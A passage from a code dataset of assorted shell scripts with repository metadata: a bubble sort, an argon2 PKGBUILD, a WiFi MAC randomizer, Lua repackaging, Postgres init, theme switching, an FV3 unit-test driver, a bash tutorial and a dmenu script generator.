# lexicographically (same [[ a > b ]] string comparison as before) and
# print the array before and after sorting.
echo "Enter your Name : "
read name
echo "Enter your Registration Number : "
read regNo

n=$#
s=($*)
echo "Array Before Sorting: "
echo "${s[*]}"

# Classic bubble sort, written with while-loops instead of C-style fors.
i=0
while (( i < n ))
do
	j=0
	while (( j < n - i - 1 ))
	do
		k=$((j + 1))
		if [[ ${s[j]} > ${s[k]} ]]
		then
			# swap adjacent out-of-order elements
			swap=${s[j]}
			s[j]=${s[k]}
			s[k]=$swap
		fi
		j=$((j + 1))
	done
	i=$((i + 1))
done

echo "Array after sorting: "
echo "${s[*]}"
| true
|
9397bd6cbafc97b6b13f81734e6631fe6fda87c3
|
Shell
|
ODEX-TOS/packages
|
/argon2/repos/core-x86_64/PKGBUILD
|
UTF-8
| 915
| 2.546875
| 3
|
[
"GPL-1.0-or-later",
"MIT"
] |
permissive
|
# Maintainer: Baptiste Jonglez <baptiste--aur at jonglez dot org>
# PKGBUILD for the argon2 reference implementation (makepkg metadata +
# build/check/package hooks; sourced by makepkg, so keep it declarative).
pkgname=argon2
pkgver=20190702
pkgrel=3
pkgdesc='A password-hashing function (reference C implementation)'
arch=('x86_64')
url='https://github.com/P-H-C/phc-winner-argon2'
license=('Apache' 'custom:CC0')
depends=('glibc')
provides=('libargon2.so')
source=("https://github.com/P-H-C/phc-winner-argon2/archive/${pkgver}/${pkgname}-${pkgver}.tar.gz")
sha256sums=('daf972a89577f8772602bf2eb38b6a3dd3d922bf5724d45e7f9589b5e830442c')
# Build with generic (non-tuned) optimizations; install libs under /usr/lib.
build() {
cd "$srcdir/phc-winner-$pkgname-$pkgver"
make OPTTARGET='none' LIBRARY_REL='lib'
}
# Run upstream's test target with the same flags used for the build.
check() {
cd "$srcdir/phc-winner-$pkgname-$pkgver"
make OPTTARGET='none' LIBRARY_REL='lib' test
}
# Install into the package root plus the (custom CC0) license file.
package() {
cd "$srcdir/phc-winner-$pkgname-$pkgver"
make OPTTARGET='none' LIBRARY_REL='lib' DESTDIR="$pkgdir" install
install -D -m0644 LICENSE "${pkgdir}/usr/share/licenses/argon2/LICENSE"
}
# vim:set ts=2 sw=2 et:
| true
|
92243282b7a401944432bd2a3152e48710e0cd37
|
Shell
|
b2gdev/Android-JB-4.1.2
|
/tcbin_misc/executables/set_wifi_mac
|
UTF-8
| 434
| 2.796875
| 3
|
[] |
no_license
|
#!/system/usr/bin/sh
# One-time WiFi MAC randomizer for a TI wl1271 on Android: if the marker
# file does not exist yet, generate a locally-administered (02:...) MAC,
# write it into the NVS calibration blob, and drop the marker so this
# never runs again.
if ! [[ -e /system/etc/firmware/ti-connectivity/random_mac_set ]]
then
echo "Creating new random MAC for WiFi"
# Hash $RANDOM and take the first five md5 byte pairs as the low octets.
# NOTE(review): $RANDOM gives only ~15 bits of entropy, so the MAC space
# is small -- confirm that is acceptable for this device.
macaddr=$(echo $RANDOM|md5sum|sed 's/^\(..\)\(..\)\(..\)\(..\)\(..\).*$/02:\1:\2:\3:\4:\5/')
# /system is normally read-only; remount rw just long enough to patch
# the NVS file and create the marker, then restore ro.
mount -o remount,rw /system
calibrator set nvs_mac /system/etc/firmware/ti-connectivity/wl1271-nvs.bin $macaddr
touch /system/etc/firmware/ti-connectivity/random_mac_set
mount -o remount,ro /system
fi
| true
|
0b2e13a68831b9a6c7c08ae2737d47b87a8704ef
|
Shell
|
saboteur-team/Saboteur-Xbox360-Patcher
|
/compress.sh
|
UTF-8
| 1,118
| 3.0625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Compile the game's Lua scripts to bytecode with the Windows luac.exe
# (under wine), rewrite the chunks for Xbox360 with ChunkSpy, then
# repackage them into LuaScripts.luap with quickbms.
# Three scripts are excluded throughout (BelleInteriorSceneManager,
# AggroSpawner, CoDSpawner).
# NOTE(review): the $(find ...) loops word-split, so paths with spaces
# would break -- presumably none of the script paths contain spaces.
echo "Compress started"
rm -fr /tmp/luascripts
cp -r ./luascripts /tmp/luascripts
rm -fr /tmp/run.bat
echo "Generate batch file"
# Emit one "luac.exe -o file file" line per script, translating the
# /tmp/luascripts prefix to the wine drive d: and / to \.
for f in $(find /tmp/luascripts -name '*.lua' ! -iname 'BelleInteriorSceneManager.lua' ! -iname 'AggroSpawner.lua' ! -iname 'CoDSpawner.lua'); do
windowspath=$(sed 's/\/tmp\/luascripts/d\:/' <<< $f)
windowspath=$(sed "s/\//\\\/g" <<< $windowspath)
echo 'D:\luac.exe -o' "\"$windowspath\"" "\"$windowspath\"" >> /tmp/run.bat
done
echo "Execute batch file to generate lua bytecode"
cp ./tools/luac.exe /tmp/luascripts/luac.exe
wine64 cmd < /tmp/run.bat >> /dev/null
rm /tmp/luascripts/luac.exe
echo "Change the bytecode to Xbox360 system"
# Rewrite each compiled chunk's header/endianness for the console target.
for f in $(find /tmp/luascripts -name '*.lua' ! -iname 'BelleInteriorSceneManager.lua' ! -iname 'AggroSpawner.lua' ! -iname 'CoDSpawner.lua'); do
lua5.1 ./tools/ChunkSpy-0.9.8/5.1/ChunkSpy.lua --auto "$f" --rewrite "saboteur" -o "$f.final"
mv "$f.final" "$f"
done
echo "Repackage luap"
cp LuaScripts.luap /tmp/LuaScripts.luap
./tools/quickbms -w -r ./luap-xbox360.bms /tmp/LuaScripts.luap /tmp/luascripts
| true
|
47a521c7aa0f03b42970adee07d99fef23bbf64b
|
Shell
|
pczapski/docker-stack
|
/docker/postgres/initdb.sh
|
UTF-8
| 477
| 2.625
| 3
|
[] |
no_license
|
#!/bin/bash
# Postgres container init hook (run from /docker-entrypoint-initdb.d):
# create the 'example' application database, then the 'keycloak' role
# and database with full privileges.
#
# Fix over the original: the file was two init scripts pasted together,
# leaving a second shebang and a redundant 'set -e' in the middle; they
# are merged into one script with a single header.
set -e

echo "Creating DB"
psql -v ON_ERROR_STOP=1 --username "$POSTGRES_USER" --dbname "$POSTGRES_DB" <<-EOSQL
	CREATE DATABASE example;
EOSQL
echo "Done Creating DB"

echo "Creating DB"
psql -v ON_ERROR_STOP=1 --username "$POSTGRES_USER" --dbname "$POSTGRES_DB" <<-EOSQL
	CREATE USER keycloak WITH PASSWORD 'password';
	CREATE DATABASE keycloak;
	GRANT ALL PRIVILEGES ON DATABASE keycloak TO keycloak;
EOSQL
echo "Done Creating DB"
| true
|
544b0f54c565b33f5929d4462236b85a6babf1f4
|
Shell
|
nevergosleep/pleaseDontCrashLinux
|
/Scripts/changeTheme
|
UTF-8
| 532
| 2.609375
| 3
|
[] |
no_license
|
#!/bin/bash
# Pick a theme via rofi and install its files over the live X/zathura/
# rofi/compton/i3 configuration, then restart i3. Exits silently when
# the rofi menu is dismissed.
#
# Fixes over the original: 'xrdb .Xresources' used a cwd-relative path
# (only worked when run from $HOME); bare 'rm' printed errors when a
# target was missing (now rm -f); expansions are quoted; the repeated
# rm+cp pairs are factored into a helper.
thm=$(echo "light;dark;dark_solid;sunset" | rofi -sep ";" -dmenu -i -p "Theme: ")
[[ -z $thm ]] && exit

theme_dir="$HOME/.Themes/$thm"

# install_file SRC DST -- replace DST with the selected theme's SRC.
install_file() {
	rm -f "$2"
	cp "$1" "$2"
}

install_file "$theme_dir/.Xresources" "$HOME/.Xresources"
xrdb "$HOME/.Xresources"
install_file "$theme_dir/zathurarc" "$HOME/.config/zathura/zathurarc"
install_file "$theme_dir/rofi/config" "$HOME/.config/rofi/config"
install_file "$theme_dir/compton.conf" "$HOME/.config/compton.conf"
install_file "$theme_dir/i3/config" "$HOME/.config/i3/config"
i3 restart
exit 0
| true
|
d1a91376b8c675b4bcd6ef06e4102e0c40a86314
|
Shell
|
MinsukJi-NOAA/UnitTesting
|
/ut.sh
|
UTF-8
| 14,904
| 3.390625
| 3
|
[] |
no_license
|
#!/bin/bash
# ut.sh - create baselines for and/or run NEMSfv3gfs unit tests.
# -e abort on error, -u treat unset vars as errors, -x trace commands.
set -eux
# bash increments SECONDS automatically; used for the elapsed-time report.
SECONDS=0
hostname
# error MESSAGE... -- print a blank line, then MESSAGE on stderr, and abort
# the script with status 1.
error() {
  echo
  echo >&2 "$@"
  exit 1
}
# usage -- print the full help text. set +x/-x temporarily disables the
# global command tracing (script runs under set -x) so the help is clean.
usage() {
set +x
echo
echo "Usage: $program -n <test-name> [ -c <baseline-cases> | -r <unit-test-cases> ] [-k] [-h]"
echo
echo " -n specify <test-name>"
echo
echo " -c create new baseline results. <baseline-cases> is"
echo " either 'all' or any combination of 'std','32bit','debug'"
echo
echo " -r run unit tests. <unit-test-cases> is either 'all' or any combination"
echo " of 'std','thread','mpi','decomp','restart','32bit','debug'"
echo
echo " -k keep run directory"
echo
echo " -h display this help and exit"
echo
echo " Examples"
echo
echo " To create new baselines and run unit tests:"
echo " 'utest -n fv3_thompson' creates and runs all for fv3_thompson"
echo
echo " To create new baselines only:"
echo " 'utest -n fv3_control -c all' creates std, 32bit, debug for fv3_control"
echo " 'utest -n fv3_iau -c std,debug' creates std, debug for fv3_iau"
echo " 'utest -n fv3_gfdlmprad_gws -c 32bit' creates 32bit for fv3_gfdlmprad_gws"
echo
echo " To run unit tests only:"
echo " 'utest -n fv3_cpt -r all' runs std,thread,mpi,decomp,restart,32bit,debug for fv3_cpt"
echo " 'utest -n fv3_control -r thread,decomp' runs thread,decomp for fv3_control"
echo " 'utest -n fv3_stochy -r restart' runs restart for fv3_stochy"
echo
set -x
}
# usage_and_exit STATUS -- show the help text, then terminate with STATUS.
usage_and_exit() {
  usage
  exit "$1"
}
# cleanup -- release the single-instance lock directory, clear the EXIT
# trap ('trap 0') so this does not recurse, and exit with current status.
cleanup() {
rm -rf ${lockdir}
trap 0
exit
}
# run_utests -- execute each case in $ut_run_cases for $TEST_NAME.
# For every case: re-source the test's namelist defaults, perturb the
# threading/MPI/decomposition/restart parameters as the case requires,
# write a run_test_<case>.env file consumed by run_test.sh, and run it.
# Globals consumed (among others): ut_run_cases PATHRT TEST_NAME
# RUNDIR_ROOT LOG_DIR MACHINE_ID RTPWD NEW_BASELINE CREATE_BASELINE
# SCHEDULER ACCNR QUEUE ROCOTO.
run_utests() {
for rc in $ut_run_cases; do
# Load namelist default and override values
source default_vars.sh
source ${PATHRT}/tests/$TEST_NAME
export RUN_SCRIPT
# comp_nm selects the compiled build / baseline suffix; only the 32bit
# and debug cases use a non-std build.
comp_nm=std
case $rc in
std)
RESTART_INTERVAL=12
;;
thread)
THRD=2
# INPES is sometimes odd, so use JNPES. Make sure JNPES is divisible by THRD
JNPES=$(( JNPES/THRD ))
TASKS=$(( INPES*JNPES*6 + WRITE_GROUP*WRTTASK_PER_GROUP ))
TPN=$(( TPN/THRD ))
NODES=$(( TASKS/TPN + 1 ))
;;
mpi)
JNPES=$(( JNPES/2 ))
TASKS=$(( INPES*JNPES*6 + WRITE_GROUP*WRTTASK_PER_GROUP ))
NODES=$(( TASKS/TPN + 1 ))
;;
decomp)
# Swap the two decomposition dimensions; answers should be unchanged.
temp=$INPES
INPES=$JNPES
JNPES=$temp
;;
restart)
# These parameters are different for regional restart, and won't work
WARM_START=.T.
NGGPS_IC=.F.
EXTERNAL_IC=.F.
MAKE_NH=.F.
MOUNTAIN=.T.
NA_INIT=0
NSTF_NAME=2,0,1,0,5
LIST_FILES="RESTART/coupler.res RESTART/fv_core.res.nc RESTART/fv_core.res.tile1.nc \
RESTART/fv_core.res.tile2.nc RESTART/fv_core.res.tile3.nc
RESTART/fv_core.res.tile4.nc RESTART/fv_core.res.tile5.nc \
RESTART/fv_core.res.tile6.nc RESTART/fv_srf_wnd.res.tile1.nc \
RESTART/fv_srf_wnd.res.tile2.nc RESTART/fv_srf_wnd.res.tile3.nc \
RESTART/fv_srf_wnd.res.tile4.nc RESTART/fv_srf_wnd.res.tile5.nc \
RESTART/fv_srf_wnd.res.tile6.nc RESTART/fv_tracer.res.tile1.nc \
RESTART/fv_tracer.res.tile2.nc RESTART/fv_tracer.res.tile3.nc \
RESTART/fv_tracer.res.tile4.nc RESTART/fv_tracer.res.tile5.nc \
RESTART/fv_tracer.res.tile6.nc RESTART/phy_data.tile1.nc \
RESTART/phy_data.tile2.nc RESTART/phy_data.tile3.nc RESTART/phy_data.tile4.nc \
RESTART/phy_data.tile5.nc RESTART/phy_data.tile6.nc RESTART/sfc_data.tile1.nc \
RESTART/sfc_data.tile2.nc RESTART/sfc_data.tile3.nc RESTART/sfc_data.tile4.nc \
RESTART/sfc_data.tile5.nc RESTART/sfc_data.tile6.nc"
# Output history files depend on the configured output format.
if [[ $OUTPUT_FILE == "'netcdf'" ]]; then
LIST_FILES="phyf024.tile1.nc phyf024.tile2.nc phyf024.tile3.nc phyf024.tile4.nc \
phyf024.tile5.nc phyf024.tile6.nc dynf024.tile1.nc dynf024.tile2.nc \
dynf024.tile3.nc dynf024.tile4.nc dynf024.tile5.nc dynf024.tile6.nc ${LIST_FILES}"
elif [[ $OUTPUT_FILE == "'nemsio'" ]]; then
LIST_FILES="phyf024.nemsio dynf024.nemsio ${LIST_FILES}"
fi
;;
32bit)
comp_nm=$rc
;;
debug)
comp_nm=$rc
;;
esac
echo "case: $rc; THRD: $THRD; INPES: $INPES; JNPES: $JNPES; TASKS: $TASKS; TPN: $TPN; NODES: $NODES"
RT_SUFFIX="_$rc"
BL_SUFFIX="_$comp_nm"
# Environment handed to run_test.sh for this case.
cat <<- EOF > ${RUNDIR_ROOT}/run_test_$rc.env
export MACHINE_ID=${MACHINE_ID}
export RTPWD=${RTPWD}
export PATHRT=${PATHRT}
export PATHTR=${PATHTR}
export NEW_BASELINE=${NEW_BASELINE}
export CREATE_BASELINE=${CREATE_BASELINE}
export RT_SUFFIX=${RT_SUFFIX}
export BL_SUFFIX=${BL_SUFFIX}
export SCHEDULER=${SCHEDULER}
export ACCNR=${ACCNR}
export QUEUE=${QUEUE}
export ROCOTO=${ROCOTO}
export LOG_DIR=${LOG_DIR}
EOF
./run_test.sh $PATHRT $RUNDIR_ROOT $TEST_NAME $rc $comp_nm > $LOG_DIR/run_${TEST_NAME}_$rc.log 2>&1
done
}
# Route every termination path (signals, errors under set -e, and normal
# exit) through cleanup so the lock directory is always removed.
trap 'echo utest interrupted; cleanup' INT
trap 'echo utest quit; cleanup' QUIT
trap 'echo utest terminated; cleanup' TERM
trap 'echo utest error on line $LINENO; cleanup' ERR
trap 'echo utest finished; cleanup' EXIT
########################################################################
#### PROGRAM STARTS ####
########################################################################
readonly program=$(basename $0)
[[ $# -eq 0 ]] && usage_and_exit 1
# Default compiler: intel
export COMPILER=${NEMS_COMPILER:-intel}
# detect_machine sets ACCNR and MACHINE_ID
source detect_machine.sh
# PATHRT - Path to unit tests directory
readonly PATHRT=$(cd $(dirname $0) && pwd -P)
cd $PATHRT
# PATHTR - Path to trunk directory
readonly PATHTR=$(cd ${PATHRT}/.. && pwd)
# make sure only one instance of utest is running
# (mkdir is atomic, so it doubles as a lock primitive; PID recorded for
# troubleshooting a stale lock)
readonly lockdir=${PATHRT}/lock
if mkdir $lockdir 2>/dev/null; then
echo $(hostname) $$ > ${lockdir}/PID
else
error "Only one instance of utest can be running at a time"
fi
# Log directory (recreated fresh on every invocation)
LOG_DIR=${PATHRT}/log_ut_$MACHINE_ID
rm -rf ${LOG_DIR}
mkdir ${LOG_DIR}
# ROCOTO, ECFLOW not used, but defined for compatibility with rt_fv3.sh
ROCOTO=false
ECFLOW=false
# Machine-dependent libraries, modules, variables, etc.
# Only Hera is supported; anything else aborts below.
if [[ $MACHINE_ID = hera.* ]]; then
export NCEPLIBS=/scratch1/NCEPDEV/global/gwv/l819/lib
source $PATHTR/NEMS/src/conf/module-setup.sh.inc
module use $PATHTR/modulefiles/${MACHINE_ID}
module load fv3
COMPILER=${NEMS_COMPILER:-intel} # in case compiler gets deleted by module purge
QUEUE=debug
dprefix=/scratch1/NCEPDEV
DISKNM=$dprefix/nems/emc.nemspara/RT
STMP=${dprefix}/stmp4
PTMP=${dprefix}/stmp2
SCHEDULER=slurm
cp fv3_conf/fv3_slurm.IN_hera fv3_conf/fv3_slurm.IN
else
error "Unknown machine ID. Edit detect_machine.sh file"
fi
# Option defaults: with no -c/-r both phases run for all cases.
CREATE_BASELINE=true
baseline_cases=
run_unit_test=true
unit_test_cases=
TEST_NAME=
keep_rundir=false
# Parse command line arguments.
# -c: create baselines only for the listed cases; -r: run unit tests
# only for the listed cases; -n: test name (required); -k: keep rundir.
# Case lists are normalized to space-separated, trimmed words.
#
# Fixes over the original:
#  - the "neither -c nor -r" default used 'run_unit_test == true'
#    (missing '$'), which compares the literal word and is never true,
#    so the documented defaults were never assigned;
#  - '[ -z $TEST_NAME ]' is now quoted (it only worked by accident via
#    the one-argument form of test).
while getopts :c:r:n:kh opt; do
  case $opt in
    c)
      run_unit_test=false
      if [ $OPTARG = all ]; then
        baseline_cases=std,32bit,debug
      else
        baseline_cases=$OPTARG
      fi
      baseline_cases=$(echo $baseline_cases | sed -e 's/^ *//' -e 's/ *$//' -e 's/,/ /g')
      # Reject anything that is not a known baseline case.
      for i in $baseline_cases
      do
        if [[ $i != std && $i != 32bit && $i != debug ]]; then
          error "Invalid baseline_cases specified: $i"
        fi
      done
      ;;
    r)
      CREATE_BASELINE=false
      if [ $OPTARG = all ]; then
        unit_test_cases=std,thread,mpi,decomp,restart,32bit,debug
      else
        unit_test_cases=$OPTARG
      fi
      unit_test_cases=$(echo $unit_test_cases | sed -e 's/^ *//' -e 's/ *$//' -e 's/,/ /g')
      # Reject anything that is not a known unit-test case.
      for i in $unit_test_cases
      do
        if [[ $i != std && $i != thread && $i != mpi && $i != decomp && \
              $i != restart && $i != 32bit && $i != debug ]]; then
          error "Invalid unit_test_cases specified: $i"
        fi
      done
      ;;
    n)
      TEST_NAME=$OPTARG
      #echo "test-name = $TEST_NAME"
      ;;
    k)
      keep_rundir=true
      ;;
    h)
      usage_and_exit 0
      ;;
    '?')
      error "$program: invalid option -$OPTARG"
      ;;
  esac
done

# TEST_NAME is a required argument
if [ -z "$TEST_NAME" ]; then
  error "$program: please specify test-name. Try 'utest -h' for usage."
fi

# Default where neither -c nor -r is specified: compile and run all cases
if [[ $CREATE_BASELINE == true && $run_unit_test == true ]]; then
  baseline_cases=std,32bit,debug
  unit_test_cases=std,thread,mpi,decomp,restart,32bit,debug
fi

echo "baseline_cases = $baseline_cases"
echo "unit_test_cases = $unit_test_cases"
echo "baseline_cases = $baseline_cases"
echo "unit_test_cases = $unit_test_cases"
# Fill in ut_compile_cases & ut_run_cases based on baseline_cases & unit_test_cases
# Cases are sorted in the order: std,thread,mpi,decomp,restart,32bit,debug
ut_compile_cases=
ut_run_cases=
if [[ $CREATE_BASELINE == true && $run_unit_test == true ]]; then
ut_compile_cases="1std 232bit 3debug"
ut_run_cases="1std 2thread 3mpi 4decomp 5restart 632bit 7debug"
elif [[ $CREATE_BASELINE == true && $run_unit_test == false ]]; then
for i in $baseline_cases; do
case $i in
std)
ut_compile_cases+=" 1$i"
ut_run_cases+=" 1$i"
;;
32bit)
ut_compile_cases+=" 2$i"
ut_run_cases+=" 2$i"
;;
debug)
ut_compile_cases+=" 3$i"
ut_run_cases+=" 3$i"
;;
esac
done
elif [[ $run_unit_test == true && $CREATE_BASELINE == false ]]; then
for i in $unit_test_cases; do
case $i in
std)
ut_compile_cases+=" 1$i"
ut_run_cases+=" 1$i"
;;
thread)
ut_compile_cases+=" 1std"
ut_run_cases+=" 2$i"
;;
mpi)
ut_compile_cases+=" 1std"
ut_run_cases+=" 3$i"
;;
decomp)
ut_compile_cases+=" 1std"
ut_run_cases+=" 4$i"
;;
restart)
ut_compile_cases+=" 1std"
ut_run_cases+=" 5$i"
;;
32bit)
ut_compile_cases+=" 2$i"
ut_run_cases+=" 6$i"
;;
debug)
ut_compile_cases+=" 3$i"
ut_run_cases+=" 7$i"
;;
esac
done
fi
ut_compile_cases=$(echo $ut_compile_cases | tr " " "\n" | sort -u)
ut_compile_cases=$(echo $ut_compile_cases | sed -e 's/^[0-9]//g' -e 's/ [0-9]/ /g')
ut_run_cases=$(echo $ut_run_cases | tr " " "\n" | sort -u)
ut_run_cases=$(echo $ut_run_cases | sed -e 's/^[0-9]//g' -e 's/ [0-9]/ /g')
if [[ ! $ut_run_cases =~ ^std && $ut_run_cases =~ restart ]]; then
ut_run_cases="std ${ut_run_cases}"
fi
echo "ut_compile_cases are $ut_compile_cases"
echo "ut_run_cases are $ut_run_cases"
########################################################################
#### COMPILE ####
########################################################################
# build_file specifies compilation options
# (lines of the form "<test-name> | <NEMS build options>")
build_file='utest.bld'
[[ -f ${build_file} ]] || error "${build_file} does not exist"
compile_log=${PATHRT}/Compile_ut_$MACHINE_ID.log
rm -f fv3_*.exe modules.fv3_* ${compile_log}
# Look up the base build options for $TEST_NAME in utest.bld.
while IFS="|" read model comp_opt; do
model_found=false
model=$(echo $model | sed -e 's/^ *//' -e 's/ *$//')
comp_opt=$(echo $comp_opt | sed -e 's/^ *//' -e 's/ *$//')
if [[ $model == ${TEST_NAME} ]]; then
base_opt=${comp_opt}
model_found=true
break
fi
done < ${build_file}
if [[ ${model_found} == false ]]; then
error "Build options for $TEST_NAME not found. Please edit utest.bld."
fi
# Build one executable per required compile case.
for name in $ut_compile_cases; do
case $name in
std)
NEMS_VER=${base_opt}
;;
32bit)
# The "32bit" case toggles whatever 32BIT setting std uses (Y<->N),
# or adds 32BIT=Y if std does not mention it.
if [[ ${base_opt} =~ "32BIT=Y" ]]; then
NEMS_VER=$(echo ${base_opt} | sed -e 's/32BIT=Y/32BIT=N/')
elif [[ ${base_opt} =~ "32BIT=N" ]]; then
NEMS_VER=$(echo ${base_opt} | sed -e 's/32BIT=N/32BIT=Y/')
else
NEMS_VER="${base_opt} 32BIT=Y"
fi
;;
debug)
NEMS_VER="${base_opt} 32BIT=Y DEBUG=Y"
;;
esac
NEMS_VER=$(echo ${NEMS_VER} | sed -e 's/^ *//' -e 's/ *$//')
echo "compile case: $name"
echo "NEMS_VER: $NEMS_VER"
./compile.sh $PATHTR/FV3 $MACHINE_ID "${NEMS_VER}" $name >${LOG_DIR}/compile_${TEST_NAME}_$name.log 2>&1
echo "bash compile is done for ${model} ${name} with ${NEMS_VER}"
done
########################################################################
#### RUN ####
########################################################################
# NEW_BASELINE is where freshly created baselines live; RTPWD is the
# baseline the comparison phase reads from.
mkdir -p ${STMP}/${USER}
NEW_BASELINE=${STMP}/${USER}/FV3_UT/UNIT_TEST
RTPWD=$DISKNM/NEMSfv3gfs/develop-20191230
if [[ $CREATE_BASELINE == true ]]; then
# Seed the new baseline area with the fixed input data sets.
rm -rf $NEW_BASELINE
mkdir -p $NEW_BASELINE
rsync -a "${RTPWD}"/FV3_* "${NEW_BASELINE}"/
rsync -a "${RTPWD}"/WW3_* "${NEW_BASELINE}"/
fi
# Directory where all simulations are run
RUNDIR_ROOT=${RUNDIR_ROOT:-${PTMP}/${USER}}/FV3_UT/ut_$$
mkdir -p ${RUNDIR_ROOT}
# unittest_log is different from REGRESSIONTEST_LOG
# defined in run_test.sh and passed onto rt_utils.sh
unittest_log=${PATHRT}/UnitTests_$MACHINE_ID.log
rm -f fail_test ${unittest_log}
if [[ $CREATE_BASELINE == true && $run_unit_test == true ]]; then
# Run to create baseline
ut_run_cases='std 32bit debug'
run_utests
rm -rf ${RUNDIR_ROOT}/*
rm -f ${LOG_DIR}/run_* ${LOG_DIR}/rt_*
# Run to compare with baseline
ut_run_cases='std thread mpi decomp restart 32bit debug'
CREATE_BASELINE=false
RTPWD=${NEW_BASELINE}
run_utests
elif [[ $CREATE_BASELINE == true && $run_unit_test == false ]]; then
# Run to create baseline
run_utests
elif [[ $CREATE_BASELINE == false && $run_unit_test == true ]]; then
# Run to compare with baseline
if [[ ! -d $NEW_BASELINE ]]; then
error "There is no baseline to run unit tests against. Create baselines first."
fi
RTPWD=${NEW_BASELINE}
run_utests
fi
########################################################################
#### UNIT TEST STATUS ####
########################################################################
# Summarize results: aggregate per-case logs, report failures collected
# in the fail_test file, and clean up on success.
#
# Fix over the original: the final "Elapsed time" line used
# '|| tee -a ${unittest_log}', so (echo never failing) the line was
# never appended to the log; it is now piped through tee like the other
# status lines.
set +e
cat ${LOG_DIR}/compile_*.log > ${compile_log}
cat ${LOG_DIR}/rt_*.log >> ${unittest_log}
if [[ -e fail_test ]]; then
  echo "FAILED TESTS: " | tee -a ${unittest_log}
  while read -r failed_test_name
  do
    echo "Test ${failed_test_name} failed " | tee -a ${unittest_log}
  done < fail_test
  echo "UNIT TEST FAILED" | tee -a ${unittest_log}
else
  echo "UNIT TEST WAS SUCCESSFUL" | tee -a ${unittest_log}
  # On success remove build products, and the run directory unless -k.
  rm -f fv3_*.x fv3_*.exe modules.fv3_*
  [[ ${keep_rundir} == false ]] && rm -rf ${RUNDIR_ROOT}
fi
date >> ${unittest_log}
elapsed_time=$(printf '%02dh:%02dm:%02ds\n' $(($SECONDS%86400/3600)) $(($SECONDS%3600/60)) $(($SECONDS%60)))
echo "Elapsed time: ${elapsed_time}. Have a nice day!" | tee -a ${unittest_log}
| true
|
a839d981c2dcfd09733741191f6f81098d57a637
|
Shell
|
yashaka/python-web-test
|
/run/pull_docker_images_for_selenoid_browsers.sh
|
UTF-8
| 597
| 3.03125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Pre-pull every browser image referenced in the Selenoid browsers.json.
#
# awk -F'"' splits each line on double quotes; on lines containing the
# word "selenoid" the 4th field is the image name, which is then piped
# line-by-line into 'docker pull'.
# NOTE(review): this relies on the JSON's exact one-key-per-line
# formatting -- a jq-based extraction would be more robust if jq is
# available.
awk -F'"' '$0 ~ /selenoid/ {print $4}' etc/selenoid/browsers.json | while read -r image ; do docker pull "$image" ; done
| true
|
f457d5cd6804ed8fc2d26bfd2d3a0d6d217dc2fd
|
Shell
|
DaleNaci/Tutorials
|
/ShellScript/myscript.sh
|
UTF-8
| 625
| 3.875
| 4
|
[] |
no_license
|
#! /bin/bash
# Bash tutorial script: demonstrates echo, variables, user input, and the
# if / if-else / elif conditional forms. Reads a name twice (once for the
# greeting, once for the conditionals below).
# ECHO COMMAND
echo Hello World!
# VARIABLE
# Uppercase by convention
# Letters, numbers, underscores
NAME="Brad"
echo "My name is ${NAME}"
# USER INPUT
# read -p prints the prompt and stores the reply in NAME (overwriting it)
read -p "Enter your name: " NAME
echo "Hello ${NAME}, nice to meet you!"
# SIMPLE IF STATEMENT
# note the quoted "$NAME": keeps the test valid when input is empty
if [ "$NAME" == "Brad" ]
then
echo "Your name is Brad"
fi
# IF-ELSE
if [ "$NAME" == "Brad" ]
then
echo "Your name is Brad"
else
echo "Your name is not Brad"
fi
# ELSE-IF (elif)
if [ "$NAME" == "Brad" ]
then
echo "Your name is Brad"
elif [ "$NAME" == "Jack" ]
then
echo "Your name is Jack"
else
echo "Your name is not Brad or Jack"
fi
| true
|
7ea1cf41fdc88df239ae0af592335a21e211bea5
|
Shell
|
mansi-k/SSD_Assignment1
|
/q10.sh
|
UTF-8
| 231
| 3.5
| 4
|
[] |
no_license
|
#!/bin/bash
# Read an operator, an operand count n, then n operands (one per line),
# and fold them left-to-right through bc -l. Division results are shown
# with four decimals; other results are echoed with any backslash-space
# pairs (bc line-wrap artifacts) removed.
read opt
read n
read res
b=1
while [ "$n" -gt 1 ]
do
	read b
	res=$(echo "$res $opt $b" | bc -l)
	n=$((n - 1))
done
if [[ $opt == "/" ]]
then
	printf "%0.4f\n" "$res"
else
	# intentionally unquoted: joins bc's wrapped lines before sed cleanup
	echo $res | sed 's/\\ //g'
fi
| true
|
4c09085b283bf5c880657321502893e7b8a9a433
|
Shell
|
Derevi/dwm-suckless-scripts
|
/dmenu-custom-command-generator
|
UTF-8
| 4,142
| 4.40625
| 4
|
[] |
no_license
|
#!/bin/bash
# dmenu custom command generator.
#
# Usage: this-script NAME PROMPT LABEL1 CMD1 [LABEL2 CMD2 ...]
#   NAME   - file name of the generated script (also symlinked to
#            /usr/local/bin/dmenu-NAME)
#   PROMPT - prompt string dmenu shows when asking for the selection
#   then pairs of arguments: a dmenu label followed by the command run
#   when that label is selected.
#
# Example (power menu):
#   ./this-script "power" "choose power option" \
#       "poweroff" "systemctl poweroff" "reboot" "systemctl reboot"
#
# Fix over the original: a stray bare word 'sym_link' before the ln -s
# always produced "command not found"; it has been removed. Expansions
# are now quoted; the generated file's contents are unchanged.

counter=1
FILENAME=
OUTPUT="/home/$(whoami)/.config/dmenu/custom-dmenu/"   ## EDIT this to whatever filepath you want

# Pass 1: create the output script and emit get_selection(), whose echo -e
# lists every odd-numbered parameter (>2) as a selectable label.
for parameter in "$@"
do
    if [ "$counter" -eq 1 ]; then
        # First parameter: output file name; write the script header.
        FILENAME=$parameter
        OUTPUT+=$parameter
        touch "$OUTPUT"
        echo -e "$OUTPUT"
        printf %s "#!/bin/bash" >> "$OUTPUT"
        echo -e "\n\n# command auto generated by custome-dmenu-generator.sh\n\n" >> "$OUTPUT"
        echo -e "get_selection () {" >> "$OUTPUT"
        printf %s "echo -e \"" >> "$OUTPUT"
    elif [ "$counter" -eq 2 ]; then
        # Second parameter: the dmenu prompt, used when closing the function.
        dmenu_prompt=$parameter
    elif [ $(($# - 1)) -eq "$counter" ]; then
        # Last label: no trailing \n separator.
        printf "$parameter" >> "$OUTPUT"
    elif [ $(( counter % 2 )) -ne 0 ]; then
        # Odd-numbered parameter: a dmenu label, separated by \n.
        echo "im the dmenu label $parameter at $counter"
        printf "$parameter" >> "$OUTPUT"
        printf %s "\n" >> "$OUTPUT"
    fi
    counter=$((counter+1))
done

# Complete the dmenu options prompt.
echo -e "\" | dmenu -p \"$dmenu_prompt\"\n}" >> "$OUTPUT"

# Pass 2: emit the if/elif chain mapping each label (odd parameters > 2)
# to the command that follows it (even parameters).
